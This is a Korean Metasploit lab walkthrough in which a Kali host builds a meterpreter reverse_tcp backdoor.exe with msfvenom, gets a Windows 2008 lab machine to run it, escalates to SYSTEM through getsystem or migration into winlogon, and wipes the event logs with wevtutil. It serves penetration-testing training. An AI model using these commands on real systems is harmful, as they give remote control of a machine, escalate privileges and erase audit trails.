metasploit 10. 윈도우 2008 로그 삭제

[실습] 윈도우 2008 로그 삭제

 

■ 사용 시스템

- Windows 2008

- KaliLinux

 

① 윈도우 2008에서 로그를 확인

(window 2008) 로그 확인 작업

시작 > 관리도구 > 이벤트 뷰어 > Windows 로그

> (응용프로그램|보안|Setup|시스템)

log를 마음대로 지우고 수정할 수 있다.

 

② 칼리리눅스에서 연결된 세션의 윈도우 2008 운영체제 사용자 권한 상승 및 로그 지우기

(Kali Linux)

# cd /root/bin

# vi reverse_resource2.rc  새로운 프로그램 제작 

use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.20.50 set ExitSession false exploit -j -z

 

# msfconsole -r reverse_resource2.rc

..... (중략) ...... [*] Processing reverse_resource.rc for ERB directives. resource (reverse_resource.rc)> use exploit/multi/handler resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (reverse_resource.rc)> set LHOST 192.168.20.50 LHOST => 192.168.20.50 resource (reverse_resource.rc)> set ExitSession false ExitSession => false resource (reverse_resource.rc)> exploit -j -z [*] Exploit running as background job.   [*] Started reverse handler on 192.168.20.50:4444 [*] Starting the payload handler... msf exploit(handler) >

 

# cd /root/bin

# msfvenom -p windows/x64/meterpreter/reverse_tcp \

LHOST=192.168.20.50 LPORT=4444 \

-f exe \

-o backdoor.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86_64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Saved as: backdoor.exe

 

# ls

backdoor.exe

 

# cp backdoor.exe /share

#

 

(windows2008)

 

kalilinux(/share/backdoor.exe) --> windows2008(바탕화면/backdoor.exe)

칼리리눅스에 공유된 디렉토리의 backdoor.exe 파일을 윈도우2008 서버의 바탕화면에 복사한다.

<Windows> + <R> => \\192.168.20.50\-> \\192.168.20.50\share 디렉토리에 존재하는 backdoor.exe 파일을 바탕화면으로 복사한다.

 

복사가 되었다면 바탕화면에 있는 backdoor.exe 파일 실행

 

 

(KaliLinux)

 

[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.201:1038) at 2015-04-22 12:23:33 +0900 <ENTER> msf exploit(handler) > sessions   Active sessions ===============   Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x64/win64 WIN-C69IMI8KPUS\Administrator @ WIN-C69IMI8KPUS 192.168.20.50:4444 -> 192.168.20.201:1038 (192.168.20.201)   msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...   meterpreter > getuid Server username: WIN-C69IMI8KPUS\Administrator meterpreter > getsystem -h Usage: getsystem [options]   Attempt to elevate your privilege to that of local system.   OPTIONS:   -h Help Banner. -t <opt> The technique to use. (Default to '0'). 0 : All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin)     meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM admin 사용자 라도 프로그램 실행시 관리자권한 실행이 따로있다.(Limit) ------------------------------------------------------------------------------------       [참고] getsystem 으로 권한이 상승되지 않은 경우      window 7/8/8.1 운영체제에 patch가 되어 있는 경우 아래와 같이 진행할 수 있다.      meterpreter> shell      Process 2928 created.      Channel 1 created.      Microsoft Windows [Version 6.1.7601]      Copyright (c) 2009 Microsoft Corporation. All rights reserved.             C:\Windows\system32>wmic process list brief | find "winlogon"      HandleCount Name Priority ProcessId ThreadCount WorkingSetSize      116 winlogon.exe 13 488 3 8327168      C:\Windows\system32>exit      meterpreter > migrate 488      [*] Migrating from 4056 to 488...      [*] Migration completed successfully.      meterpreter > getuid      Server username: NT AUTHORITY\SYSTEM ------------------------------------------------------------------------------------  meterpreter > shell   Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.   C:\Windows\system32>wevtutil.exe el Analytic Application DirectShowFilterGraph DirectShowPluginControl ..... (중략) ..... Microsoft-Windows-Wordpad/Debug Microsoft-Windows-Wordpad/Diagnostic Microsoft-Windows-mobsync/Diagnostic Microsoft-Windows-ntshrui Microsoft-Windows-osk/Diagnostic Microsoft-Windows-stobject/Diagnostic Security Setup System TabletPC_InputPanel_Channel ThinPrint Diagnostics WINDOWS_MP4SDECD_CHANNEL WMPSetup WMPSyncEngine Windows PowerShell microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin muxencode   C:\Windows\system32>wevtutil.exe cl "System"       wevtutil cl System  wevtutil.exe cl System   C:\Windows\system32>wevtutil.exe cl "Application"  wevtutil cl Application  wevtutil cl Application   C:\Windows\system32>wevtutil.exe cl "Security"     wevtutil cl Security  wevtutil cl Security   C:\Windows\system32>wevtutil.exe cl "Setup"        wevtutil cl Setup  wevtutil cl Setup

-> security, system, application, directory service, 'dns server', 'file replication service'

등에 대해서도 지우는 과정을 진행한다.

 

(windows 2008)

 

③ 윈도우 2008에서 로그 확인

로그 확인 작업

시작 > 제어판 > 관리도구 > 이벤트 뷰어 > Windows 로그

> (응용프로그램|보안|Setup|시스템)

 

(KaliLinux)

 

④ 칼리리눅스에서 msfconsole 종료

C:\Windows\system32>exit exit meterpreter > quit [*] Shutting down Meterpreter...   [*] 192.168.20.201 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > quit root@kali:~/bin#

 

 

 

[참고] 윈도우즈 이벤트 로그 지우는 방법에 대한 참고 URL

https://technet.microsoft.com/ko-kr/library/cc722318.aspx

 

 

 

[실습] One liner commands for windows – cheat sheet

http://travisaltman.com/one-liner-commands-for-windows-cheat-sheet/

-> 다음 사이트의 명령어를 정리한다.(약 20분)

One liner commands for windows &ndash; cheat sheet.txt

 

 

[참고] 윈도우 CMD 명령어 목록

http://zetawiki.com/wiki/%EC%9C%88%EB%8F%84%EC%9A%B0_CMD_%EB%AA%85%EB%A0%B9%EC%96%B4_%EB%AA%A9%EB%A1%9D

 

 

[참고] List of DOS commands

http://en.wikipedia.org/wiki/List_of_DOS_commands